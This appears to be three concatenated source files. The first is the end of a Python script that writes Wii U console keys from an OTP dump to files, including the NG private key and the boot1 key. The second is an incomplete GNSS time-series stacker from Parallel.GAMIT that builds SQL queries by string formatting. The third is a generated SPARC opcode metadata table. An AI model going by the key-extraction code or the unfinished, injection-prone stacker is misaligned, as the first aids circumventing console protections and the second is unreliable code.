keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_rng_key).decode('utf-8')+"\n")
name="08. Wii U SLC (NAND) key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_slc_nand_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_slc_nand_key).decode('utf-8')+"\n")
# 3. Wii U Bank
keytxt.write("\n 3. Wii U Bank\n")
targetfol=out3
name="01. Wii U MLC (eMMC) key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_mlc_emmc_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_mlc_emmc_key).decode('utf-8')+"\n")
name="02. Key to encrypt and decrypt SHDD key"
fi = open(targetfol+name+".bin", "wb")
fi.write(encrypt_decrypt_shdd_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(encrypt_decrypt_shdd_key).decode('utf-8')+"\n")
name="03. Key to encrypt DRH WLAN data"
fi = open(targetfol+name+".bin", "wb")
fi.write(encryption_key_for_drh_wlan_data)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(encryption_key_for_drh_wlan_data).decode('utf-8')+"\n")
name="04. Unknown (07)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_07_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_07_unused).decode('utf-8')+"\n")
name="05. Wii U SLC (NAND) HMAC"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_slc_nand_hmac)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_slc_nand_hmac).decode('utf-8')+"\n")
name="06. Unknown (08 - Padding)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_08_padding)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_08_padding).decode('utf-8')+"\n")
# 4. Wii U Bank
keytxt.write("\n 4. Wii U Bank\n")
targetfol=out4
name="01. Unknown (09)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_09_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_09_unused).decode('utf-8')+"\n")
name="02. Unknown (10)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_10_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_10_unused).decode('utf-8')+"\n")
name="03. Wii U NG ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_ng_id)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_ng_id).decode('utf-8')+"\n")
name="04. Wii U NG Private Key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_ng_private_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_ng_private_key).decode('utf-8')+"\n")
name="05. Wii U private key for NSS device certificate"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_private_nss_device_cert_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_private_nss_device_cert_key).decode('utf-8')+"\n")
name="06. Wii U RNG seed (only the first 0x04 bytes are used)"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_otp_rng_seed)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_otp_rng_seed).decode('utf-8')+"\n")
name="07. Unknown (12)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_12_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_12_unused).decode('utf-8')+"\n")
# 5. Wii U Bank
keytxt.write("\n 5. Wii U Bank\n")
targetfol=out5
name="01. Wii U root certificate MS ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ms_id_0x00000012)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ms_id_0x00000012).decode('utf-8')+"\n")
name="02. Wii U root certificate CA ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ca_id_0x00000003)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ca_id_0x00000003).decode('utf-8')+"\n")
name="03. Wii U root certificate NG key ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ng_key_id)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ng_key_id).decode('utf-8')+"\n")
name="04. Wii U root certificate NG signature"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ng_signature)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ng_signature).decode('utf-8')+"\n")
name="04. Unknown (14 - Unused)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_14_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_14_unused).decode('utf-8')+"\n")
name="05. Unknown (locked out by boot1)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_15_locked_by_boot1)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_15_locked_by_boot1).decode('utf-8')+"\n")
# 7. Misc Bank
keytxt.write("\n 7. Wii U Bank\n")
targetfol=out7
name="01. Unknown (locked by boot1)"
fi = open(targetfol+name+".bin", "wb")
fi.write(boot1_locked_unknown_01)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(boot1_locked_unknown_01).decode('utf-8')+"\n")
name="02. boot1 key (locked by boot0)"
fi = open(targetfol+name+".bin", "wb")
fi.write(boot1_key_locked_by_b0)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(boot1_key_locked_by_b0).decode('utf-8')+"\n")
name="03. Unknown (locked out by boot0, not used)"
fi = open(targetfol+name+".bin", "wb")
fi.write(boot0_locked_unused_01)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(boot0_locked_unused_01).decode('utf-8')+"\n")
name="04. Empty 1"
fi = open(targetfol+name+".bin", "wb")
fi.write(misc_empty1)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(misc_empty1).decode('utf-8')+"\n")
name="05. Empty 2"
fi = open(targetfol+name+".bin", "wb")
fi.write(misc_empty2)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(misc_empty2).decode('utf-8')+"\n")
name="06. OTP Version and Revision"
fi = open(targetfol+name+".bin", "wb")
fi.write(otp_date_code)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(otp_date_code).decode('utf-8')+"\n")
name="07. OTP Date Code"
fi = open(targetfol+name+".bin", "wb")
fi.write(otp_version_and_revision)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(otp_version_and_revision).decode('utf-8')+"\n")
name="08. OTP Version Name String"
fi = open(targetfol+name+".bin", "wb")
fi.write(otp_version_name_string)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(otp_version_name_string).decode('utf-8')+"\n")
name="09. Empty 3"
fi = open(targetfol+name+".bin", "wb")
fi.write(misc_empty3)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(misc_empty3).decode('utf-8')+"\n")
name="10. JTAG status"
fi = open(targetfol+name+".bin", "wb")
fi.write(jtag_status)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(jtag_status).decode('utf-8')+"\n")
#End file output
| mit | -5,033,038,418,475,891,000 | 29.374525 | 174 | 0.646304 | false |
demiangomez/Parallel.GAMIT | stacker/pyNEQStack.py | 1 | 6703 | """
Project: Parallel.Stacker
Date: 6/12/18 10:28 AM
Author: Demian D. Gomez
"""
import dbConnection
import pyOptions
import argparse
import pyETM
import pyJobServer
import numpy
import pyDate
from pyDate import Date
from tqdm import tqdm
import traceback
from pprint import pprint
import os
import numpy as np
from scipy.stats import chi2
from Utils import process_date
from Utils import ct2lg
from Utils import ecef2lla
from Utils import rotct2lg
LIMIT = 2.5
def adjust_lsq(A, L, P=None):
cst_pass = False
iteration = 0
factor = 1
So = 1
dof = (A.shape[0] - A.shape[1])
X1 = chi2.ppf(1 - 0.05 / 2, dof)
X2 = chi2.ppf(0.05 / 2, dof)
s = np.array([])
v = np.array([])
C = np.array([])
if P is None:
P = np.ones((A.shape[0]))
while not cst_pass and iteration <= 10:
W = np.sqrt(P)
Aw = np.multiply(W[:, None], A)
Lw = np.multiply(W, L)
C = np.linalg.lstsq(Aw, Lw, rcond=-1)[0]
v = L - np.dot(A, C)
# unit variance
So = np.sqrt(np.dot(v, np.multiply(P, v)) / dof)
x = np.power(So, 2) * dof
# obtain the overall uncertainty predicted by lsq
factor = factor * So
# calculate the normalized sigmas
s = np.abs(np.divide(v, factor))
if x < X2 or x > X1:
# if it falls in here it's because it didn't pass the Chi2 test
cst_pass = False
# reweigh by Mike's method of equal weight until 2 sigma
f = np.ones((v.shape[0],))
sw = np.power(10, LIMIT - s[s > LIMIT])
sw[sw < np.finfo(np.float).eps] = np.finfo(np.float).eps
f[s > LIMIT] = sw
P = np.square(np.divide(f, factor))
else:
cst_pass = True
iteration += 1
# some statistics
SS = np.linalg.inv(np.dot(A.transpose(), np.multiply(P[:, None], A)))
sigma = So * np.sqrt(np.diag(SS))
# mark observations with sigma <= LIMIT
index = s <= LIMIT
return C, sigma, index, v, factor, P, iteration
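# Illustrative use of adjust_lsq (synthetic sketch, not part of the stacker):
# fit y = a + b*t where one epoch is an outlier; the Chi-square test on the
# unit variance drives the iterative reweighting.
#
# t = np.arange(10.)
# A = np.column_stack((np.ones_like(t), t))
# L = 2. + 0.5 * t
# L[4] += 10. # simulated outlier
# C, sigma, index, v, factor, P, it = adjust_lsq(A, L)
# # C should come out near [2, 0.5] and index[4] should be False.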
def sql_select_union(project, fields, date1, date2, stn_filter=None):
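# Returns, for every station solved on both date1 and date2 of the given
# project, the requested columns taken from the date2 (g2) solution. Entries
# in 'fields' are prefixed with the g2 alias; a leading '-' negates the
# column and the literals '0'/'1' are passed through unchanged.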
ff = []
for f in fields.split(','):
if f.strip() not in ('0', '1'):
if '-' in f.strip():
ff.append('-g2.' + f.strip().replace('-', ''))
else:
ff.append('g2.' + f.strip())
else:
ff.append(f.strip())
fields = ','.join(ff)
if stn_filter:
where = ' AND g1."NetworkCode" || \'.\' || g1."StationCode" IN (\'' + '\',\''.join(stn_filter) + '\')'
else:
where = ''
sql = '''SELECT %s from gamit_soln g1
LEFT JOIN gamit_soln g2 on
g1."NetworkCode" = g2."NetworkCode" and
g1."StationCode" = g2."StationCode" and
g1."Project" = g2."Project" and
g1."Year" = %i and
g1."DOY" = %i and
g2."Year" = %i and
g2."DOY" = %i
WHERE g1."Year" = %i and g1."DOY" = %i AND g2."Year" IS NOT NULL
AND g1."Project" = \'%s\' %s ORDER BY g2."NetworkCode", g2."StationCode"''' % \
(fields, date1.year, date1.doy, date2.year, date2.doy, date1.year, date1.doy, project, where)
return sql
def sql_select(project, fields, date2):
sql = '''SELECT %s from gamit_soln
WHERE "Project" = \'%s\' AND "Year" = %i AND "DOY" = %i
ORDER BY "NetworkCode", "StationCode"''' % (fields, project, date2.year, date2.doy)
return sql
def rotate_sigmas(ecef, lat, lon):
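# Rotates a diagonal ECEF covariance into the local (north, east, up) frame,
# i.e. S_neu = R * diag(ecef) * R^T evaluated at (lat, lon); only the NEU
# variances (the diagonal) are returned.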
R = rotct2lg(lat, lon)
sd = np.diagflat(ecef)
sneu = np.dot(np.dot(R[:, :, 0], sd), R[:, :, 0].transpose())
dneu = np.diag(sneu)
return dneu
def dra(cnn, project, dates):
rs = cnn.query('SELECT "NetworkCode", "StationCode" FROM gamit_soln '
'WHERE "Project" = \'%s\' AND "FYear" BETWEEN %.4f AND %.4f GROUP BY "NetworkCode", "StationCode" '
'ORDER BY "NetworkCode", "StationCode"' % (project, dates[0].fyear, dates[1].fyear))
stnlist = rs.dictresult()
# get the epochs
ep = cnn.query('SELECT "Year", "DOY" FROM gamit_soln '
'WHERE "Project" = \'%s\' AND "FYear" BETWEEN %.4f AND %.4f'
'GROUP BY "Year", "DOY" ORDER BY "Year", "DOY"' % (project, dates[0].fyear, dates[1].fyear))
ep = ep.dictresult()
epochs = [Date(year=item['Year'], doy=item['DOY']) for item in ep]
A = np.array([])
Ax = []
Ay = []
Az = []
for station in stnlist:
print 'stacking %s.%s' % (station['NetworkCode'], station['StationCode'])
try:
etm = pyETM.GamitETM(cnn, station['NetworkCode'], station['StationCode'], project=project)
except Exception as e:
print " Exception: " + str(e)
continue
x = etm.soln.x
y = etm.soln.y
z = etm.soln.z
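# Per-station rows of the linearized similarity (Helmert) transform: the
# skew-symmetric [0,-z,y; z,0,-x; -y,x,0] blocks carry the small rotations
# about X, Y, Z and the unit columns carry the three translations.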
Ax.append(np.array([np.zeros(x.shape), -z, y, np.ones(x.shape), np.zeros(x.shape), np.zeros(x.shape)]).transpose())
Ay.append(np.array([z, np.zeros(x.shape), -x, np.zeros(x.shape), np.ones(x.shape), np.zeros(x.shape)]).transpose())
Az.append(np.array([-y, x, np.zeros(x.shape), np.zeros(x.shape), np.zeros(x.shape), np.ones(x.shape)]).transpose())
x = np.column_stack((Ax, etm.A, np.zeros(etm.A.shape), np.zeros(etm.A.shape)))
y = np.column_stack((Ay, np.zeros(etm.A.shape), etm.A, np.zeros(etm.A.shape)))
z = np.column_stack((Az, np.zeros(etm.A.shape), np.zeros(etm.A.shape), etm.A))
A = np.row_stack((x, y, z))
def main():
parser = argparse.ArgumentParser(description='GNSS time series stacker')
parser.add_argument('project', type=str, nargs=1, metavar='{project name}',
help="Specify the project name used to process the GAMIT solutions in Parallel.GAMIT.")
parser.add_argument('-d', '--date_filter', nargs='+', metavar='date',
help='Date range filter Can be specified in yyyy/mm/dd yyyy_doy wwww-d format')
args = parser.parse_args()
cnn = dbConnection.Cnn("gnss_data.cfg")
Config = pyOptions.ReadOptions("gnss_data.cfg") # type: pyOptions.ReadOptions
# create the execution log
dates = [pyDate.Date(year=1980, doy=1), pyDate.Date(year=2100, doy=1)]
try:
dates = process_date(args.date_filter)
except ValueError as e:
parser.error(str(e))
# create folder for plots
if not os.path.isdir(args.project[0]):
os.makedirs(args.project[0])
########################################
# load polyhedrons
project = dra(cnn, args.project[0], dates)
if __name__ == '__main__':
main() | gpl-3.0 | -5,775,745,574,475,761,000 | 27.52766 | 123 | 0.556766 | false |
knz/slcore | slc/tools/slc/mt/mtsparc/asmproc/opc/mtsparc.py | 1 | 38790 | # This file was generated by decode.py. Do not edit!
# For each instruction the information available is:
# re_parser, input_regs, output_regs, double_regs, long_latency, delayed, extra_phy_inputs, extra_phy_outputs, immediates, is_branch, is_condbranch
import re
class insn_metadata(object):
def __init__(self, info):
self.inputs, self.outputs, self.double_regs, self.long_latency, self.delayed, self.extra_inputs, self.extra_outputs, self.immediates, self.is_branch, self.is_condbranch = info
reg = r"""(\$[lgsd]?f?\d+|%(?:sp|fp|[ilog][0-7]|[rf]\d+))"""
imm = r"""([^%$]\S*|%(?:(?:hi|lo)x?|hh|hm|lm|h44|m44|uhi|ulo|(?:tgd|tldm|tie)_(?:hi22|lo10)|(?:tldo|tle)_(?:hix22|lox10))\([^)]+\))"""
re000 = re.compile(r'''\s*''' + imm + r'''\s*$''')
re001 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re002 = re.compile(r'''\s*$''')
re003 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re004 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*,\s*''' + reg + r'''\s*$''')
re005 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*,\s*''' + reg + r'''\s*$''')
re006 = re.compile(r'''\s*(?:)\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re007 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re008 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re009 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re010 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re011 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re012 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re013 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re014 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re015 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re016 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re017 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re018 = re.compile(r'''\s*''' + reg + r'''\s*$''')
re019 = re.compile(r'''\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re020 = re.compile(r'''\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re021 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re022 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re023 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re024 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re025 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re026 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re027 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re028 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re029 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re030 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re031 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*$''')
re032 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%asr\S*\s*$''')
re033 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%asr\S*\s*$''')
re034 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%y\S*\s*$''')
re035 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%y\S*\s*$''')
re036 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%psr\S*\s*$''')
re037 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%psr\S*\s*$''')
re038 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%wim\S*\s*$''')
re039 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%wim\S*\s*$''')
re040 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%tbr\S*\s*$''')
re041 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%tbr\S*\s*$''')
re042 = re.compile(r'''\s*%asr\d+\S*\s*,\s*''' + reg + r'''\s*$''')
re043 = re.compile(r'''\s*%y\S*\s*,\s*''' + reg + r'''\s*$''')
re044 = re.compile(r'''\s*%psr\S*\s*,\s*''' + reg + r'''\s*$''')
re045 = re.compile(r'''\s*%wim\S*\s*,\s*''' + reg + r'''\s*$''')
re046 = re.compile(r'''\s*%tbr\S*\s*,\s*''' + reg + r'''\s*$''')
re047 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%asr\S*\s*$''')
re048 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%asr\S*\s*$''')
re049 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%y\S*\s*$''')
re050 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%y\S*\s*$''')
re051 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%psr\S*\s*$''')
re052 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%psr\S*\s*$''')
re053 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%wim\S*\s*$''')
re054 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%wim\S*\s*$''')
re055 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%tbr\S*\s*$''')
re056 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%tbr\S*\s*$''')
re057 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re058 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re059 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re060 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re061 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re062 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re063 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re064 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re065 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re066 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re067 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re068 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re069 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re070 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re071 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re072 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re073 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re074 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re075 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re076 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re077 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re078 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re079 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re080 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re081 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re082 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*$''')
re083 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*$''')
re084 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re085 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re086 = re.compile(r'''\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re087 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*$''')
re088 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*$''')
re089 = re.compile(r'''\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*$''')
re090 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*$''')
re091 = re.compile(r'''\s*''' + imm + r'''\s*,\s*\d+\s*$''')
re092 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*\d+\s*$''')
re093 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\d+\s*$''')
re094 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*,\s*\d+\s*$''')
re095 = re.compile(r'''\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*\d+\s*$''')
re096 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re097 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re098 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re099 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re100 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re101 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re102 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re103 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re104 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re105 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re106 = re.compile(r'''\s*%wim\S*\s*,\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
form000 = insn_metadata(([], [], [], False, True, [], [], [0], False, True))
form001 = insn_metadata(([0, 1], [2], [], False, False, [], [], [], False, False))
form002 = insn_metadata(([], [], [], False, False, [], [], [], False, False))
form003 = insn_metadata(([0], [2], [], False, False, [], [], [1], False, False))
form004 = insn_metadata(([0, 1], [2], [], True, False, [], [], [], False, False))
form005 = insn_metadata(([0], [1], [], True, False, [], [], [], False, False))
form006 = insn_metadata(([], [1], [], False, False, [], [], [0], False, False))
form007 = insn_metadata(([0, 1], [2], [2], True, False, [], [], [], False, False))
form008 = insn_metadata(([0], [1], [1], True, False, [], [], [], False, False))
form009 = insn_metadata(([0], [2], [2], True, False, [], [], [1], False, False))
form010 = insn_metadata(([1], [2], [2], True, False, [], [], [0], False, False))
form011 = insn_metadata(([], [1], [1], True, False, [], [], [0], False, False))
form012 = insn_metadata(([0, 1], [], [], True, False, [], [], [], False, False))
form013 = insn_metadata(([0], [], [], True, False, [], [], [], False, False))
form014 = insn_metadata(([0], [], [], True, False, [], [], [1], False, False))
form015 = insn_metadata(([1], [], [], True, False, [], [], [0], False, False))
form016 = insn_metadata(([], [], [], True, False, [], [], [0], False, False))
form017 = insn_metadata(([0], [1], [], False, False, [], [], [], False, False))
form018 = insn_metadata(([], [0], [], False, False, [], [], [], False, False))
form019 = insn_metadata(([0, 1], [2], [0, 1, 2], True, False, [], [], [], False, False))
form020 = insn_metadata(([1], [2], [], False, False, [], [], [0], False, False))
form021 = insn_metadata(([0, 1], [], [0], False, False, [], [], [], False, False))
form022 = insn_metadata(([0, 1], [1], [], False, False, [], [], [], False, False))
form023 = insn_metadata(([1], [1], [], False, False, [], [], [0], False, False))
form024 = insn_metadata(([0], [2], [], True, False, [], [], [1], False, False))
form025 = insn_metadata(([1], [2], [], True, False, [], [], [0], False, False))
form026 = insn_metadata(([], [1], [], True, False, [], [], [0], False, False))
form027 = insn_metadata(([0], [], [], False, False, [], [], [], False, False))
form028 = insn_metadata(([], [0], [], True, False, [], [], [], False, False))
